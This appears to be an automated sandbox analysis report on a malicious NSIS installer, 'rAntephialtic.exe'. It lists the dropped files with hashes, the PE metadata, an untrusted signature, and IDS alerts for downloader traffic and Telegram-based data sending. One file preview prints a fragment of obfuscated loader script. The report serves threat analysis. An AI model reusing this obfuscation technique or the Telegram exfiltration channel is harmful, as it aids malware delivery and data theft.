                                                                                                                                                    C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Illustrable\Berliner.jpg

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\Desktop\rAntephialtic.exe
                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 569x676, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):66534
                                                                                                                                                    Entropy (8bit):7.963009588542882
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:v769k7fHg9JJz9Qw30HPeB8i123APVoSthJCx0fjVKhtsf+w62:IkbHSv+3vUDSSDJND+w62
                                                                                                                                                    MD5:F5711710261C0FB12DCA7CA15D9AD619
                                                                                                                                                    SHA1:8FA9011C8928BD4E2C129555FCEE5BC0E2447813
                                                                                                                                                    SHA-256:EB7ADBCC59113FA1D0DC08FF84AE930561F9433F6A0D938B99D83C6544C4D84D
                                                                                                                                                    SHA-512:ED634E895A5E871115C8C887B843C425B2D260F43CD61518C8D12EFC33321E7C7F2340415F7EF8154877A98754C541539253376616E93837AA7FE0122E04D192
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........9.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....(....V..9...T;.).R:.j*P..@.n....w.....3K!bOL.j..P..,w.......&7.<69...k3C.........!.2..Q....m*...@...JR[2..s|..m...w7..S....E.%..m...../1.oE....1.}../*g.z>.#r......GE.P.@....{q..'.J....{..(..:4lU.....SZ.a..c.I.r.7/.....\4..\..V.of..Z.o.V...q5.3O..../....P.@..8.sY....5&..<...P...m...%..[H....p;....b]_..}5..X..Op..i....0I'.N.G...k...7.".M.E.....V ..g."...O

                                                                                                                                                    C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Illustrable\Chondrosin42.den

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\Desktop\rAntephialtic.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):6956940
                                                                                                                                                    Entropy (8bit):0.15824996919408987
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:Q72H0/f/NEjMkBPvKVTgfhzfniFbsxgICqJ+vWk5XZk2kBVKtPu5j1RR5e5kOqwR:AA451Cr3vpxFxYPX
                                                                                                                                                    MD5:AC7CCC8A1C064ADD6329C0CC4BFAA83B
                                                                                                                                                    SHA1:19D96A96EAEF0CF2EDCEFE4A54F951025E28166C
                                                                                                                                                    SHA-256:B2A5A9667276510EA8008E5B90A9539058D329FCF76D969B0A2056B6E604B0B6
                                                                                                                                                    SHA-512:CFD12AC04657884EB75DF562DFCB3A372522200573C57489A53BF8C19110E4C1D070B13059CF86BA77757319ACA0B510CA79D273588651DDE5DD4A9134E7F6A5
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????g????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????.??????????????????????7????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????.????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????.????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????.???????.???????????????????

                                                                                                                                                    C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Illustrable\Dinitrocellulose.jpg

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\Desktop\rAntephialtic.exe
                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 615x599, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):61331
                                                                                                                                                    Entropy (8bit):7.975327377427721
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:qkTTO8yLkLulAcfg6QTY+QjRsmjoKZqR+GjAqR9NgIto9:DHO8yLkLaAyY+W+oMP9qR9NgIu
                                                                                                                                                    MD5:995F3CC5AFDECFCD7C6A17D8FA1B8B04
                                                                                                                                                    SHA1:3A23E71CA73D26137B7D58F4BEAD462A6ED62765
                                                                                                                                                    SHA-256:6E793312F0BE4F73D7A61666C0FF61780AE44D497CE007257F81F5DF96B321F5
                                                                                                                                                    SHA-512:445C74A8F3F9284CB5BB8300580826D96703D35F41A46F09EA434305385BE11D90C0F6729A4704BA7276613F6BB065A17F3998F242FA84FAA0D7940B4D521144
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......W.g.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...=j.....EgH.vcR.L#.a...5.....B...B/J..k.f.-....[Y<..8.k.E..RdrO..5q...!.4..aE..._+ {...b#.....J...-B.u.g....*....@...........6J..#+.E...T.r..P!.....G%..@.``.rO4.N......M..=...|(.....U..X...Z.n.g.40%Q.E).@.....'.R.....sNN0v...Pr..-..t.7.."..6.X......ZX...`..i.p9.JFU.7.s.. .zT.Uo..A.6.5Z....rMS.T...[.j.sh...f..L.....Q..j.\.f....Lu..X+#~5.lI@,....Pc.F.l

                                                                                                                                                    C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Illustrable\Driftsmiddels.jpg

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\Desktop\rAntephialtic.exe
                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 644x760, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):80483
                                                                                                                                                    Entropy (8bit):7.947457993682135
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:qjf2YT5NAqOYZPjkaKOAlP6pnumIMHU7MHjzezBd9NEfQbM/zlf:vNYZPDnQ6pnuxMU2zeVrGkM/Bf
                                                                                                                                                    MD5:AF05EEA867741C9F3E393B481E2AA0ED
                                                                                                                                                    SHA1:77841CBFAE1252E02E3D8DD24BC4D32B8D0DA001
                                                                                                                                                    SHA-256:2D6991CAF38EFAE38D2849D8BCC3D00AA7AC1DB419AB378DF4823A5516C72CE0
                                                                                                                                                    SHA-512:B1833112351C5163DC42E91929BAF641D0950D2185193D3BA8D0C8FBBA3B3EE068E38C7DD1DE5F8660BC986E560BC397F350F8A623972601E59B2B437AA5CD3D
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..i....wZ....Kho....H.y.....H.....$....p.=....>..].g..?t...! q.=.Z......>E%..k.._j....8....c...j...6`.....W.=0.W..).dE.g..S...-oL.....F".....v<d..2}j.....w.6....1...o1P........\.....z..-..5..........r.8.XI....ey.BcU`6..>a......;.\l....RAb.d..v........j.k#R.....^].i......;...........A .6...|z~.QK..f`.uU......E>X.......8..s.?...g).]-...w....g..96..9!I.1.

                                                                                                                                                    C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Kinestheses.Tra

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\Desktop\rAntephialtic.exe
                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (3173), with CRLF, LF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):54080
                                                                                                                                                    Entropy (8bit):5.317746130228025
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:wj7u/ytfDkfTspAvZPzBXY/6N/wRysUR0P2e9x:wj7uatbW0A1YCN2UG2eb
                                                                                                                                                    MD5:4281BB34DBC6A97669B1815F61D33612
                                                                                                                                                    SHA1:605F5B8E73077D2814DA07642031CE974B08F2CD
                                                                                                                                                    SHA-256:4903967D23168AE80A460EB825AD870AA4DCDC57932A522999442F4612EF3C20
                                                                                                                                                    SHA-512:9062F880F1D9AF15DA31F40A648677D1BC8D581C19AEBFF91628DCB9DC1C00B461270CF0B37F29FA26522FC75D4CF3E4476FD95D26EE7162A8C9AA44B2C52184
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:$Unmovedly=$smygedes;........$Seglstampe = @'.Tr,vr.skytt$s.rivFPearta igesrOvertvIndkreBl cktBrochoAniman OplaeReforrAcetonTilsteKobbe=Inter$CringCSkrefiprpost nlggrnskepostyrtnTelaup P.imrMarbee DvrgsBarmcsStyneeSuffrrIlloyeOttenidemokrStjs ppap,rlCliniaForskyMidstssomme;Ca.op.OptugfUnderu SvignTill cQuirktPorphiRef soInv lnReval KasteDN,tica CatanVa gbsModulk AffaeAf,adj Det e L rddPredeeDomit Ma e(deu e$nontrCeurasi T.ent VessrKursioNonmonInduspSva hr Inteemimets U edss,unte RobbrTiname Eksp,Vandl$ dsugSSpon iBaj rn DesseLangvc Basuu UmedrSpradiBalannSynovg S ru)Dy el Nonin{Unpro.Bawdi.Untru$ Ev nRB,etoi Signppaho.i .nche LimbnForgliEscha Polis( r caFTridiaRotats Ade hSerraiFor ao Sys nudforaPartlb.impslEveryeA,gio Emaci'Y rurGStd,rl BramiValounRetinsGngge$,edun ExpreGUnscaiBankrr Tehun K,nsC,akroL MyopiAn lofProteeNervirEx eri,ukse O skADau dfBron,fJokesiSkredt elaMProste MerylAtten indicnSuff r Res TTy ogrSensuiIllibc ritieuntrao Mons Tetr PSk eraSlu.mrAdelga,orten S olT arse

                                                                                                                                                    C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Muskinesses.Spi

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\Desktop\rAntephialtic.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):327781
                                                                                                                                                    Entropy (8bit):7.71140249734367
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:k9JBPh8wvqU3YXcDFwCfSEUnKA6Upky5jN8Tic+etLz3H0/3P:EKw93Y2Fwe1GkyRSTR+6PH0//
                                                                                                                                                    MD5:F195683D18325A42C4304EEB0DC6367A
                                                                                                                                                    SHA1:55A61C425735952BADE435BF3CE82A181BBDF3C8
                                                                                                                                                    SHA-256:B2723EAC8AABE559621C85AB475078BA196DA645D2E5A2618A318DF01B70EBE9
                                                                                                                                                    SHA-512:1BD37D58671FAA0D62B44A85F3DC321CA25315B3D3735D90F1C688EDCDB7921B12E175D277E7EC385E4CEBADAF5E70C2AE7B7D50FBE1C2E670482BD836E5827A
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:........``............--.^...c........888...M.`....7............S.........a.....................yyy.fffff...............................s....III...........`...H.....A..b.??................................!.............%..............|....kkk.zzz.......=.....H..........RR..}}}.:.............i....UU...GG..............N.............ggg.....v.R.........bb.....................a.....r.O.@......l..5.........vv.......<<..``.D.........{.P......!!!.................kk....p................```.....//..............CCCCC...........................PPPP.......................3.{..Z..4.......................MM...............f.......?.....11.....M.....&&&&&.....M............qq."..............BBBB.................JJJ.......??...4...F..............www.........................A.../..F..2.............>>..............................b..eee.m........."......{{.....//.j.............k..!!!.......................;.tt...*.........vvvv.[....))).......dddd...[[.aaa......................;.......pp............8.......

                                                                                                                                                    Static File Info

                                                                                                                                                    General

                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                    Entropy (8bit):7.856567991289499
                                                                                                                                                    TrID:
                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                    File name:rAntephialtic.exe
                                                                                                                                                    File size:1'542'704 bytes
                                                                                                                                                    MD5:65249febec3f7bde1c51b92ff5d3c4a7
                                                                                                                                                    SHA1:459c11b637dc859eacea6d65489729f7b32fbf27
                                                                                                                                                    SHA256:f9d051b1d729d3a1689e7b1454902012a5d757f5b5339db346ffcead746802f6
                                                                                                                                                    SHA512:e739a509aa7029116395a436f6b9c07e9e74bae0e81c312e0e0663c315be862a118b18d60c45b72268b47ad09a13ed0c9db54d4f97eba474c154d14d8cbe9a1c
                                                                                                                                                    SSDEEP:24576:nMwM9cEY0ASIJSEwseD6Ph717SM5vw+WDC5InZ/L9GrsXpJzXo1AH9HBevK9Y9Ey:nMwLhcOPhNSM9w+wCyig5JzXo1AtBUK2
                                                                                                                                                    TLSH:47652301229898DBE5F20B30D56AE07571BE7C665B93491F22FA3F2FA5733311A8760D
                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....$_.................f...*.....

                                                                                                                                                    File Icon

                                                                                                                                                    Icon Hash:0f2d2d2d4f4e4d37

                                                                                                                                                    Static PE Info

                                                                                                                                                    General

                                                                                                                                                    Entrypoint:0x40348f
                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                    Digitally signed:true
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                    Time Stamp:0x5F24D6C5 [Sat Aug 1 02:43:17 2020 UTC]
                                                                                                                                                    TLS Callbacks:
                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                    OS Version Major:4
                                                                                                                                                    OS Version Minor:0
                                                                                                                                                    File Version Major:4
                                                                                                                                                    File Version Minor:0
                                                                                                                                                    Subsystem Version Major:4
                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                    Import Hash:6e7f9a29f2c85394521a08b9f31f6275

                                                                                                                                                    Authenticode Signature

                                                                                                                                                    Signature Valid:false
                                                                                                                                                    Signature Issuer:CN=Inflex, E=Transportbranchers@Subworkman.Aa, O=Inflex, L=West Covina, OU="Eksamensprojekt Teatraliseredes ", S=California, C=US
                                                                                                                                                    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                                    Error Number:-2146762487
                                                                                                                                                    Not Before, Not After
                                                                                                                                                    • 14/09/2024 10:14:58 14/09/2025 10:14:58
                                                                                                                                                    Subject Chain
                                                                                                                                                    • CN=Inflex, E=Transportbranchers@Subworkman.Aa, O=Inflex, L=West Covina, OU="Eksamensprojekt Teatraliseredes ", S=California, C=US
                                                                                                                                                    Version:3
                                                                                                                                                    Thumbprint MD5:61B936835FABE5DDA72B5367E7505600
                                                                                                                                                    Thumbprint SHA-1:1974291448AAAF02DF668A12B21674FD9D83BD5E
                                                                                                                                                    Thumbprint SHA-256:5F8C9E6A1D3D8924DF51951C799B31F84863E63B8791C69192ED0F42A99B5F8B
                                                                                                                                                    Serial:035B3E3C6DCE8D9CA03F8AED298E85C7B8F9069D

                                                                                                                                                    Entrypoint Preview

                                                                                                                                                    Instruction
                                                                                                                                                    sub esp, 000002D4h
                                                                                                                                                    push ebx
                                                                                                                                                    push esi
                                                                                                                                                    push edi
                                                                                                                                                    push 00000020h
                                                                                                                                                    pop edi
                                                                                                                                                    xor ebx, ebx
                                                                                                                                                    push 00008001h
                                                                                                                                                    mov dword ptr [esp+14h], ebx
                                                                                                                                                    mov dword ptr [esp+10h], 0040A2E0h
                                                                                                                                                    mov dword ptr [esp+1Ch], ebx
                                                                                                                                                    call dword ptr [004080CCh]
                                                                                                                                                    call dword ptr [004080D0h]
                                                                                                                                                    and eax, BFFFFFFFh
                                                                                                                                                    cmp ax, 00000006h
                                                                                                                                                    mov dword ptr [0042A22Ch], eax
                                                                                                                                                    je 00007F74A05FA553h
                                                                                                                                                    push ebx
                                                                                                                                                    call 00007F74A05FD841h
                                                                                                                                                    cmp eax, ebx
                                                                                                                                                    je 00007F74A05FA549h
                                                                                                                                                    push 00000C00h
                                                                                                                                                    call eax
                                                                                                                                                    mov esi, 004082B0h
                                                                                                                                                    push esi
                                                                                                                                                    call 00007F74A05FD7BBh
                                                                                                                                                    push esi
                                                                                                                                                    call dword ptr [00408154h]
                                                                                                                                                    lea esi, dword ptr [esi+eax+01h]
                                                                                                                                                    cmp byte ptr [esi], 00000000h
                                                                                                                                                    jne 00007F74A05FA52Ch
                                                                                                                                                    push 0000000Bh
                                                                                                                                                    call 00007F74A05FD814h
                                                                                                                                                    push 00000009h
                                                                                                                                                    call 00007F74A05FD80Dh
                                                                                                                                                    push 00000007h
                                                                                                                                                    mov dword ptr [0042A224h], eax
                                                                                                                                                    call 00007F74A05FD801h
                                                                                                                                                    cmp eax, ebx
                                                                                                                                                    je 00007F74A05FA551h
                                                                                                                                                    push 0000001Eh
                                                                                                                                                    call eax
                                                                                                                                                    test eax, eax
                                                                                                                                                    je 00007F74A05FA549h
                                                                                                                                                    or byte ptr [0042A22Fh], 00000040h
                                                                                                                                                    push ebp
                                                                                                                                                    call dword ptr [00408038h]
                                                                                                                                                    push ebx
                                                                                                                                                    call dword ptr [00408298h]
                                                                                                                                                    mov dword ptr [0042A2F8h], eax
                                                                                                                                                    push ebx
                                                                                                                                                    lea eax, dword ptr [esp+34h]
                                                                                                                                                    push 000002B4h
                                                                                                                                                    push eax
                                                                                                                                                    push ebx
                                                                                                                                                    push 004216C8h
                                                                                                                                                    call dword ptr [0040818Ch]
                                                                                                                                                    push 0040A2C8h

                                                                                                                                                    Rich Headers

                                                                                                                                                    Programming Language:
                                                                                                                                                    • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                                                    Data Directories

                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x4e0000x2a330.rsrc
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x1782e80x748
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                    Sections

                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                    .text0x10000x64110x66001be075c408f39c844a297d85521f5b93False0.6545266544117647data6.40243296676441IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                    .rdata0x80000x13980x1400e3e8d62e1d2308b175349eb9daa266c8False0.4494140625data5.137750894959169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                    .data0xa0000x203380x60092925084f722469459e6111e8ee4a9d0False0.5013020833333334data4.020801365171916IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                    .ndata0x2b0000x230000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                    .rsrc0x4e0000x2a3300x2a40034887897fbeaa2fe2059ab5c9219aca8False0.3391041050295858data5.120413177835508IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                    Resources

                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                    RT_ICON0x4e4480x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.23470957056666272
                                                                                                                                                    RT_ICON0x5ec700x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.37150515030481396
                                                                                                                                                    RT_ICON0x681180x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.4220887245841035
                                                                                                                                                    RT_ICON0x6d5a00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.3892300425129901
                                                                                                                                                    RT_ICON0x717c80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.48941908713692944
                                                                                                                                                    RT_ICON0x73d700x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.5687148217636022
                                                                                                                                                    RT_ICON0x74e180xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.6127398720682303
                                                                                                                                                    RT_ICON0x75cc00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.6633574007220217
                                                                                                                                                    RT_ICON0x765680x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.46707317073170734
                                                                                                                                                    RT_ICON0x76bd00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.4595375722543353
                                                                                                                                                    RT_ICON0x771380x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.7340425531914894
                                                                                                                                                    RT_ICON0x775a00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.553763440860215
                                                                                                                                                    RT_ICON0x778880x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.597972972972973
                                                                                                                                                    RT_DIALOG0x779b00x120dataEnglishUnited States0.5104166666666666
                                                                                                                                                    RT_DIALOG0x77ad00x11cdataEnglishUnited States0.6091549295774648
                                                                                                                                                    RT_DIALOG0x77bf00xc4dataEnglishUnited States0.5918367346938775
                                                                                                                                                    RT_DIALOG0x77cb80x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                    RT_GROUP_ICON0x77d180xbcdataEnglishUnited States0.648936170212766
                                                                                                                                                    RT_VERSION0x77dd80x214dataEnglishUnited States0.5131578947368421
                                                                                                                                                    RT_MANIFEST0x77ff00x340XML 1.0 document, ASCII text, with very long lines (832), with no line terminatorsEnglishUnited States0.5540865384615384

                                                                                                                                                    Imports

                                                                                                                                                    DLLImport
                                                                                                                                                    ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                                                                                                                    SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                                                                                                                    ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                                                                                                                    COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                                                                                                    USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, SetWindowPos, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                                                                                                                    GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                                                                                                    KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersion, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, ExitProcess, CopyFileW, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

                                                                                                                                                    Version Infos

                                                                                                                                                    DescriptionData
                                                                                                                                                    Commentsskeletonised unbaling
                                                                                                                                                    CompanyNameevalueringsrkkeflgerne dissention revalueringerne
                                                                                                                                                    FileVersion3.1.0.0
                                                                                                                                                    ProductNamestampningernes
                                                                                                                                                    Translation0x0409 0x04e4

                                                                                                                                                    Possible Origin

                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                    EnglishUnited States

                                                                                                                                                    Network Behavior

                                                                                                                                                    Suricata IDS Alerts

                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                    2025-02-20T20:02:26.278155+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749975142.250.184.238443TCP
                                                                                                                                                    2025-02-20T20:02:31.147629+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749977132.226.247.7380TCP
                                                                                                                                                    2025-02-20T20:02:32.600834+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749977132.226.247.7380TCP
                                                                                                                                                    2025-02-20T20:02:33.190660+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749979104.21.32.1443TCP
                                                                                                                                                    2025-02-20T20:02:34.085155+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749980132.226.247.7380TCP
                                                                                                                                                    2025-02-20T20:02:37.130720+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749985104.21.32.1443TCP
                                                                                                                                                    2025-02-20T20:02:38.434124+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749987104.21.32.1443TCP
                                                                                                                                                    2025-02-20T20:02:41.150543+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749991104.21.32.1443TCP
                                                                                                                                                    2025-02-20T20:02:43.485069+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.749994149.154.167.220443TCP
                                                                                                                                                    2025-02-20T20:02:50.061631+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.749995149.154.167.220443TCP

                                                                                                                                                    Network Port Distribution

                                                                                                                                                    TCP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
